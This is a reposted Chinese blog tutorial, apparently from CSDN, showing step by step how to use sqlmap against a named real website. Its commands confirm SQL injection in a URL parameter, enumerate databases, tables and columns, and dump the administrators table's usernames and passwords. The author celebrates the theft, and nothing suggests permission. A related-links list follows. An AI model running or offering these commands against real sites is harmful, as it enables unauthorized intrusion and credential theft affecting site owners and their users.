转载:sqlmap的应用实战
原文链接:https://blog.csdn.net/vala0901/article/details/71548954
有幸在kali中文网上查看了很多大神写的sqlmap的教程,其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结,给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤,啊,不,是拖库。。。。。
1.首先要知道可以注入的网址是什么
http://www.bible-history.com/subcat.php?id=2
2.接着就可以针对这个网址来检测能不能注入,以及查看它的所有数据库列表了
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --dbs (注意:dbs前面是两个横杠)
注入的结果表示:
(1)注入参数id为GET注入,注入类型有四种,分别是:boolean-based blind/error-based/time-based blind/union query
(2)web应用程序技术为:Apache PHP
(3)数据库类型:MySQL
(4)画红圈的是网址所有的数据库名单
其中可能有你输入[Y/N]的,统统回车解决吧。
3.这时,我们发现这个网址存在注入,并且拿到了所有数据库名单。我们决定查看web当前使用的数据库
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-db
红线画出的就是当前使用的数据库:bible_history,一会我们会针对这个数据库下手。。。
4.探测web数据库使用的账号
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-user
可见当前的数据库使用账户为:bho@localhost
5.下面我们来探测bible_history这个数据库里的所有表
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history --tables
其中:
(1)D指出数据库名字
(2)tables列出表
6.下面我想探测的是administrators这个表的列
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators --columns
其中:
(1)T指定要列出字段的表
(2)columns列出列
7.表中字段明显拿到了。。。。下面一步还用说么?果断脱裤。。。。好开心。。。。
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators -C admin_id,admin_username,admin_password --dump
成功!!!
(PS:自从逛了大神技术贴,就再也不能好好说“拖库”了。。。满脑子都是给web脱裤。。。。我天朝的男程序员们就是如此闷骚阔爱)认真脸。。。
转载:sqlmap的应用实战相关推荐
- [转载]秀脱linux实战笔记linux-kernel-3.0.3实战篇
+++++++++++++++++++++++++++++++++++++++++++++++++++++++ 秀脱linux实战笔记linux-kernel-3.0.3实战片篇: QQ: 6 ...
- (转载)Android项目实战(二十八):使用Zxing实现二维码及优化实例
Android项目实战(二十八):使用Zxing实现二维码及优化实例 作者:听着music睡 字体:[增加 减小] 类型:转载 时间:2016-11-21 我要评论 这篇文章主要介绍了Android项 ...
- (转载)Android项目实战(二十七):数据交互(信息编辑)填写总结
Android项目实战(二十七):数据交互(信息编辑)填写总结 前言: 项目中必定用到的数据填写需求.比如修改用户名的文字编辑对话框,修改生日的日期选择对话框等等.现总结一下,方便以后使用. 注: 先 ...
- SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)
CONTENTS 1 项目实验环境 2 SQL注入概述 2.1 SQL注入简介 2.2 SQL注入的危害 3 SQL基础回顾 3.1 联合查询union 3.2 information_schema数 ...
- [转载]Vue 2.x 实战之后台管理系统开发(一)
2. 开发前须知 我的后台管理系统项目运用了如下框架/插件: Vue 2.x -- 项目所使用的 js 框架,我所使用的版本是:2.1.10 vue-router 2 -- Vue 2.x 配套路由, ...
- (转载)大数据实战:站在JMP分析平台上的FIT足迹识别技术
http://www.csdn.net/article/2014-03-16/2818786-interview-jmp-fit 摘要: 1.作为公益性动物保护组织,WildTrack是如何在JMP统 ...
- [转载]Hot Door CADtools (实战篇)
1.工具的概述 A.将CADtools工具安装到Illustrator的Plugins文件下面,安装完成后会出现一个Tools的文件夹.启动你的Illustrator后,打开菜单Window/CADt ...
- 【转载保存】Lucene 实战教程第六章 Lucene 的精确、包含、集合查询 Query 的简单使用
原链接:https://www.xttblog.com/?p=3532 所有的搜索基本上都存在精确匹配,包含等操作.Lucene 中同样存在这样的操作,今天我们以 IntPoint 为例,来说说 Lu ...
- 企业实战|Mysql不停机维护主从同步
转载来源 :企业实战|Mysql不停机维护主从同步 : https://mp.weixin.qq.com/s/CQFmFhtRMFsESofDpTOvUA 实战环境: Mysql-5.7 Xtraba ...
最新文章
- jquery的页面加载完执行的函数
- 如何让你的操作系统更安全二
- 澳网:公茂鑫/张择创历史 中国男网夺大满贯首胜
- LunarCrush将比特币批评家Peter Schiff列为第二大比特币影响者
- Oracle与MySQL使用区别
- Elon Mask又搞大事情:新公司要将人脑与机器连接,给大脑上传想法不再是科幻...
- 写一本Linux内核方面的书籍
- 华为发布IdeaHub S2系列,与华为云会议结合更强大
- Struts2通配符
- 2020年CSP-J2 CSP-S2 复赛题解
- 解决微信开发工具卡顿的问题
- STM32F103C8T6连接LD3320语音识别模块(USART)
- MSF基础--show options
- python hasattr() getattr() setattr()函数的使用
- form表单序列化 $('#form1').serialize()到后台没值
- 多元函数可导为什么不一定连续
- 打造优雅的PC环境软件篇
- Linux常用命令——whoami命令
- 数据库语言关键字分类(详细):
- 【HDU】1283 最简单的计算机
热门文章
- 剑指Offer_编程题_22
- poj3279 Fliptile
- 字符集详解 ------------------------ UNICODE +UTF8
- 解决ScrollView嵌套ViewPager出现的滑动冲突问题
- NDK JNI方式读写Android系统的GPIO
- 用shell写了一个自动编译代码的脚本
- 2021全州高中高考成绩查询,最新!最全!桂林各中学高考成绩汇总!为桂林考生骄傲!...
- WebStorm添加多个项目到当前工程目录
- .net运行项目的几种形式
- swift中使用core data